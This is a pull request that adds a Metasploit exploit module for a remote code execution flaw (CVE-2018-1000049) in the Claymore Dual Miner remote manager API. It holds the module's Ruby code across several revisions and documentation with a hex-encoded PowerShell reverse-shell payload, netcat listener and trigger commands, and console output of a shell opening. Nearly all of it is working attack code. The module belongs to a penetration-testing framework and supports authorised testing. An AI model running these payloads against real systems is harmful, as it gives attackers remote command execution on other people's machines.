### PR TITLE
Add exploit: claymore_dual_miner_remote_manager_rce

### DIFF
--- a/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md
+++ b/documentation/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rce.md
@@ -1,0 +1,48 @@
+## Description
+
+This module connects to the Claymore Dual Miner API server to exploit the RCE.
+This module can target the remote system if the miner is running with read/write mode enabled.
+
+## Vulnerable Application
+
+[Claymore Dual Miner](https://github.com/nanopool/Claymore-Dual-Miner) allows an user to control the miner
+configuration by uploading files inside its directory using the server API. Since there is no check on file names, an attacker
+can exploit this vulnerability by uploading a reboot.bat or reboot.sh file and execute it via Remote Manager GUI.
+
+## Verification Steps
+
+1. Start the vulnerable software: `EthDcrMiner64.exe -epool eth-eu1.nanopool.org:9999 -ewal 0x83718eb67761Cf59E116B92A8F5B6CFE28A186E2 -epsw x -mode 1 -ftime 10 -mport 3333`
+2. Run on terminal: `{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat", "706f7765727368656c6c2e657865202d436f6d6d616e64202224636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e536f636b6574732e544350436c69656e7428273132372e302e302e31272c31323334293b2473747265616d203d2024636c69656e742e47657453747265616d28293b5b627974655b5d5d246279746573203d20302e2e36353533357c257b307d3b7768696c6528282469203d202473747265616d2e52656164282462797465732c20302c202462797465732e4c656e6774682929202d6e652030297b3b2464617461203d20284e65772d4f626a656374202d547970654e616d652053797374656d2e546578742e4153434949456e636f64696e67292e476574537472696e67282462797465732c302c202469293b2473656e646261636b203d202869657820246461746120323e2631207c204f75742d537472696e6720293b2473656e646261636b3220203d202473656e646261636b202b202750532027202b2028707764292e50617468202b20273e20273b2473656e6462797465203d20285b746578742e656e636f64696e675d3a3a4153434949292e4765744279746573282473656e646261636b32293b2473747265616d2e5772697465282473656e64627974652c302c2473656e64627974652e4c656e677468293b2473747265616d2e466c75736828297d3b24636c69656e742e436c6f7365282922"]}`
+3. Run on terminal: `nc -lvp 1234`
+4. Run on terminal: `echo -e '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}\n' | nc 127.0.0.1 3333 && echo`
+5. You should get a shell
+
+## Options
+
+  **RHOST**
+
+  Remote Host
+
+  **RPORT**
+
+  Remote port the vulnerable software is running at, default is 3333.
+
+
+### Remote target
+
+  ```
+  msf5 > use exploit/multi/misc/claymore_dual_miner_remote_manager_rce
+  msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set rhost 127.0.0.1
+  rhost => 127.0.0.1
+  msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > set lhost 127.0.0.1
+  lhost => 127.0.0.1
+  msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rcee) > set lport 1234
+  lport => 1234
+  msf5 exploit(multi/misc/claymore_dual_miner_remote_manager_rce) > exploit
+
+  [*] Started reverse TCP handler on 127.0.0.1:1234
+  [*] Command shell session 1 opened (127.0.0.1:1234 -> 127.0.0.1:3333) at 2018-07-02 18:43:41 +0000
+
+  whoami
+  reversebrain
+  ```

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -86,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
       sock.put(upload)
       buf = sock.get_once || ''
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-      puts e
+      print_error(e)
       elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
     ensure
       disconnect

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if str.include?('WARNING')
         return Exploit::CheckCode::Vulnerable
       else
-	return Exploit::CheckCode::Detected
+        return Exploit::CheckCode::Detected
       end
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
       print_error(e)

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -54,7 +54,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     register_options(
       [
-        OptAddress.new('RHOST', [ true, 'Set miner host', '127.0.0.1' ]),
         OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])
       ])
     deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
@@ -87,7 +86,6 @@ class MetasploitModule < Msf::Exploit::Remote
       buf = sock.get_once || ''
     rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
       print_error(e)
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
     ensure
       disconnect
     end
@@ -96,16 +94,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def trigger_vulnerability
     execute = '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}'
-    begin
-      connect
-      sock.put(execute)
-      buf = sock.get_once || ''
-    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-      print_error(e)
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-    ensure
-      disconnect
-    end
+    connect
+    sock.put(execute)
+    buf = sock.get_once || ''
+  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+    print_error(e)
+  ensure
+    disconnect
   end
 
   def exploit
@@ -119,34 +114,32 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     data = '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}'
-    begin
-      connect
-      sock.put(data)
-      buf = sock.get_once || ''
-      tmp = StringIO.new
-      tmp << buf
-      tmp2 = tmp.string
-      hex = ''
-      case target['Platform']
-      when 'linux'
-        hex = tmp2.scan(/\w+/)[5]
-      when 'windows'
-        hex = tmp2.scan(/\w+/)[7]
-      end
-      if not hex
-        return Exploit::CheckCode::Safe
-      end
-      str = hex_to_bin(hex)
-      if str.include?('WARNING')
-        return Exploit::CheckCode::Vulnerable
-      else
-        return Exploit::CheckCode::Detected
-      end
-    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-      print_error(e)
-      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-    ensure
-      disconnect
+    connect
+    sock.put(data)
+    buf = sock.get_once || ''
+    tmp = StringIO.new
+    tmp << buf
+    tmp2 = tmp.string
+    hex = ''
+    case target['Platform']
+    when 'linux'
+      hex = tmp2.scan(/\w+/)[5]
+    when 'windows'
+      hex = tmp2.scan(/\w+/)[7]
     end
+    if not hex
+      return Exploit::CheckCode::Safe
+    end
+    str = hex_to_bin(hex)
+    if str.include?('WARNING')
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Detected
+    end
+  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+    vprint_error(e)
+    return Exploit::CheckCode::Unknown
+  ensure
+    disconnect
   end
 end

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -169,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     target = select_target
     if target.nil?
-      fail_with(Exploit::Failure::NoTarget, 'No matching target')
+      fail_with(Failure::NoTarget, 'No matching target')
     end
     if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
       (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -173,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
       (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
-      fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'"
+      fail_with(Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'")
     end
     case target['Platform']
     when 'linux'

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -68,9 +68,19 @@ class MetasploitModule < Msf::Exploit::Remote
     end
     case target['Platform']
     when 'linux'
-      upload = "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"miner_file\",\"params\":[\"reboot.bash\", \"#{cmd}\"]}"
+      upload = {
+        "id"      => 0,
+        "jsonrpc" => '2.0',
+        "method"  => 'miner_file',
+        "params"  => ['reboot.bash', "#{cmd}"]
+      }.to_json
     when 'windows'
-      upload = "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"miner_file\",\"params\":[\"reboot.bat\", \"#{cmd}\"]}"
+      upload = {
+        "id"      => 0,
+        "jsonrpc" => '2.0',
+        "method"  => 'miner_file',
+        "params"  => ['reboot.bat', "#{cmd}"]
+      }.to_json
     end
     begin
       connect
@@ -105,7 +115,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    data = '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}'
+    data = {
+      "id"      => 0,
+      "jsonrpc" => '2.0',
+      "method"  => 'miner_getfile',
+      "params"  => ['config.txt']
+    }.to_json
     connect
     sock.put(data)
     buf = sock.get_once || ''

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -26,8 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'         => MSF_LICENSE,
       'References'      =>
         [
-          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000049'],
-          ['CVE', '2018-1000049']
+          ['EDB', '44638'],
+          ['CVE', '2018-1000049'],
+          ['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
         ],
       'Platform'        => ['win', 'linux'],
       'Targets'         =>

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -33,16 +33,19 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform'        => ['win', 'linux'],
       'Targets'         =>
         [
+          [ 'Automatic Target', { 'auto' => true }],
           [ 'Linux',
             {
               'Platform' => 'linux',
-              'Arch' => ARCH_X64
+              'Arch' => ARCH_X64,
+              'CmdStagerFlavor' => [ 'bourne', 'echo', 'printf' ]
             }
           ],
           [ 'Windows',
             {
               'Platform' => 'windows',
-              'Arch' => ARCH_X64
+              'Arch' => ARCH_X64,
+              'CmdStagerFlavor' => [ 'certutil', 'vbs' ]
             }
           ]
         ],
@@ -60,66 +63,34 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
   end
 
-  def execute_command(cmd, opts = {})
-    case target['Platform']
-    when 'linux'
-      cmd = Rex::Text.to_hex(cmd, '')
-    when 'windows'
-      cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
-    end
-    case target['Platform']
-    when 'linux'
-      upload = {
-        "id"      => 0,
-        "jsonrpc" => '2.0',
-        "method"  => 'miner_file',
-        "params"  => ['reboot.bash', "#{cmd}"]
-      }.to_json
-    when 'windows'
-      upload = {
-        "id"      => 0,
-        "jsonrpc" => '2.0',
-        "method"  => 'miner_file',
-        "params"  => ['reboot.bat', "#{cmd}"]
-      }.to_json
-    end
-    begin
-      connect
-      sock.put(upload)
-      buf = sock.get_once || ''
-    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-      print_error(e)
-    ensure
-      disconnect
-    end
-    trigger_vulnerability
-  end
-
-  def trigger_vulnerability
-    execute = {
+  def select_target
+    data = {
       "id"      => 0,
       "jsonrpc" => '2.0',
-      "method"  => 'miner_reboot'
+      "method"  => 'miner_getfile',
+      "params"  => ['config.txt']
     }.to_json
     connect
-    sock.put(execute)
+    sock.put(data)
     buf = sock.get_once || ''
-  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-    print_error(e)
-  ensure
-    disconnect
-  end
-
-  def exploit
-    case target['Platform']
-    when 'linux'
-      execute_cmdstager
-    when 'windows'
-      execute_cmdstager(linemax: 20000)
+    tmp = StringIO.new
+    tmp << buf
+    tmp2 = tmp.string
+    hex = ''
+    if tmp2.scan(/\w+/)[5]
+      return self.targets[1]
+    elsif tmp2.scan(/\w+/)[7]
+      return self.targets[2]
+    else
+      return nil
     end
   end
 
   def check
+    target = select_target
+    if target.nil?
+      return Exploit::CheckCode::Safe
+    end
     data = {
       "id"      => 0,
       "jsonrpc" => '2.0',
@@ -139,9 +110,6 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'windows'
       hex = tmp2.scan(/\w+/)[7]
     end
-    if not hex
-      return Exploit::CheckCode::Safe
-    end
     str = Rex::Text.hex_to_raw(hex)
     if str.include?('WARNING')
       return Exploit::CheckCode::Vulnerable
@@ -149,9 +117,69 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Detected
     end
   rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
-    vprint_error(e)
+    vprint_error(e.message)
     return Exploit::CheckCode::Unknown
   ensure
     disconnect
+  end
+
+  def execute_command(cmd, opts = {})
+    target = select_target
+    case target['Platform']
+    when 'linux'
+      cmd = Rex::Text.to_hex(cmd, '')
+      upload = {
+        "id"      => 0,
+        "jsonrpc" => '2.0',
+        "method"  => 'miner_file',
+        "params"  => ['reboot.bash', "#{cmd}"]
+      }.to_json
+    when 'windows'
+      cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
+      upload = {
+        "id"      => 0,
+        "jsonrpc" => '2.0',
+        "method"  => 'miner_file',
+        "params"  => ['reboot.bat', "#{cmd}"]
+      }.to_json
+    end
+
+    connect
+    sock.put(upload)
+    buf = sock.get_once || ''
+    trigger_vulnerability
+  rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  ensure
+    disconnect
+  end
+
+  def trigger_vulnerability
+    execute = {
+      "id"      => 0,
+      "jsonrpc" => '2.0',
+      "method"  => 'miner_reboot'
+    }.to_json
+    connect
+    sock.put(execute)
+    buf = sock.get_once || ''
+    disconnect
+  end
+
+  def exploit
+    target = select_target
+    if target.nil?
+      fail_with(Exploit::Failure::NoTarget, 'No matching target')
+    end
+    if (target['Platform'].eql?('linux') && payload_instance.name !~ /linux/i) ||
+      (target['Platform'].eql?('windows') && payload_instance.name !~ /windows/i)
+      fail_with Failure::BadConfig, "Selected payload '#{payload_instance.name}' is not compatible with target operating system '#{target.name}'"
+    end
+    case target['Platform']
+    when 'linux'
+      execute_cmdstager(flavor: :echo, linemax: 100000)
+    when 'windows'
+      execute_cmdstager(flavor: :vbs, linemax: 100000)
+    end
   end
 end

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -59,20 +59,12 @@ class MetasploitModule < Msf::Exploit::Remote
     deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
   end
 
-  def bin_to_hex(s)
-    s.each_byte.map { |b| b.to_s(16) }.join
-  end
-
-  def hex_to_bin(s)
-    s.scan(/../).map { |x| x.hex.chr }.join
-  end
-
   def execute_command(cmd, opts = {})
     case target['Platform']
     when 'linux'
-      cmd = bin_to_hex(cmd)
+      cmd = Rex::Text.to_hex(cmd, '')
     when 'windows'
-      cmd = bin_to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
+      cmd = Rex::Text.to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first), '')
     end
     case target['Platform']
     when 'linux'
@@ -130,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if not hex
       return Exploit::CheckCode::Safe
     end
-    str = hex_to_bin(hex)
+    str = Rex::Text.hex_to_raw(hex)
     if str.include?('WARNING')
       return Exploit::CheckCode::Vulnerable
     else

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -77,10 +77,10 @@ class MetasploitModule < Msf::Exploit::Remote
     tmp << buf
     tmp2 = tmp.string
     hex = ''
-    if tmp2.scan(/\w+/)[5]
-      return self.targets[1]
-    elsif tmp2.scan(/\w+/)[7]
+    if tmp2.scan(/\w+/)[7]
       return self.targets[2]
+    elsif tmp2.scan(/\w+/)[5]
+      return self.targets[1]
     else
       return nil
     end

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -96,7 +96,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def trigger_vulnerability
-    execute = '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}'
+    execute = {
+      "id"      => 0,
+      "jsonrpc" => '2.0',
+      "method"  => 'miner_reboot'
+    }.to_json
     connect
     sock.put(execute)
     buf = sock.get_once || ''

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -1,0 +1,152 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Nanopool Claymore Dual Miner APIs RCE',
+      'Description'     => %q{
+        This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
+      },
+      'Author'          =>
+        [
+          'reversebrain@snado', # Vulnerability reporter
+          'phra@snado'          # Metasploit module
+        ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1000049'],
+          ['CVE', '2018-1000049']
+        ],
+      'Platform'        => ['win', 'linux'],
+      'Targets'         =>
+        [
+          [ 'Linux',
+            {
+              'Platform' => 'linux',
+              'Arch' => ARCH_X64
+            }
+          ],
+          [ 'Windows',
+            {
+              'Platform' => 'windows',
+              'Arch' => ARCH_X64
+            }
+          ]
+        ],
+      'Payload' =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DisclosureDate'  => 'Feb 09 2018',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptAddress.new('RHOST', [ true, 'Set miner host', '127.0.0.1' ]),
+        OptPort.new('RPORT', [ true, 'Set miner port', 3333 ])
+      ])
+    deregister_options('URIPATH', 'SSL', 'SSLCert', 'SRVPORT', 'SRVHOST')
+  end
+
+  def bin_to_hex(s)
+    s.each_byte.map { |b| b.to_s(16) }.join
+  end
+
+  def hex_to_bin(s)
+    s.scan(/../).map { |x| x.hex.chr }.join
+  end
+
+  def execute_command(cmd, opts = {})
+    case target['Platform']
+    when 'linux'
+      cmd = bin_to_hex(cmd)
+    when 'windows'
+      cmd = bin_to_hex(cmd_psh_payload(payload.encoded, payload_instance.arch.first))
+    end
+    case target['Platform']
+    when 'linux'
+      upload = "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"miner_file\",\"params\":[\"reboot.bash\", \"#{cmd}\"]}"
+    when 'windows'
+      upload = "{\"id\":0,\"jsonrpc\":\"2.0\",\"method\":\"miner_file\",\"params\":[\"reboot.bat\", \"#{cmd}\"]}"
+    end
+    begin
+      connect
+      sock.put(upload)
+      buf = sock.get_once || ''
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      puts e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    ensure
+      disconnect
+    end
+    trigger_vulnerability
+  end
+
+  def trigger_vulnerability
+    execute = '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}'
+    begin
+      connect
+      sock.put(execute)
+      buf = sock.get_once || ''
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      print_error(e)
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    ensure
+      disconnect
+    end
+  end
+
+  def exploit
+    case target['Platform']
+    when 'linux'
+      execute_cmdstager
+    when 'windows'
+      execute_cmdstager(flavor: :certutil, linemax: 10000)
+    end
+  end
+
+  def check
+    data = '{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}'
+    begin
+      connect
+      sock.put(data)
+      buf = sock.get_once || ''
+      tmp = StringIO.new
+      tmp << buf
+      tmp2 = tmp.string
+      hex = ''
+      case target['Platform']
+      when 'linux'
+        hex = tmp2.scan(/\w+/)[5]
+      when 'windows'
+        hex = tmp2.scan(/\w+/)[7]
+      end
+      if not hex
+        return Exploit::CheckCode::Safe
+      end
+      str = hex_to_bin(hex)
+      if str.include?('WARNING')
+        return Exploit::CheckCode::Vulnerable
+      else
+	return Exploit::CheckCode::Detected
+      end
+    rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
+      print_error(e)
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+    ensure
+      disconnect
+    end
+  end
+end

--- a/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
+++ b/modules/exploits/multi/misc/claymore_dual_miner_remote_manager_rce.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when 'linux'
       execute_cmdstager
     when 'windows'
-      execute_cmdstager(flavor: :certutil, linemax: 10000)
+      execute_cmdstager(linemax: 20000)
     end
   end
 


### PR DESCRIPTION
see #10063

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/misc/claymore_dual_miner_remote_manager_rce`
- [x] launch claymore miner w/ management port on TCP/3333
- [x] `exploit`
- [x] _profit_ :shipit: 


![image](https://user-images.githubusercontent.com/984628/40263472-16d80d24-5b13-11e8-910f-5211379dd00b.png)
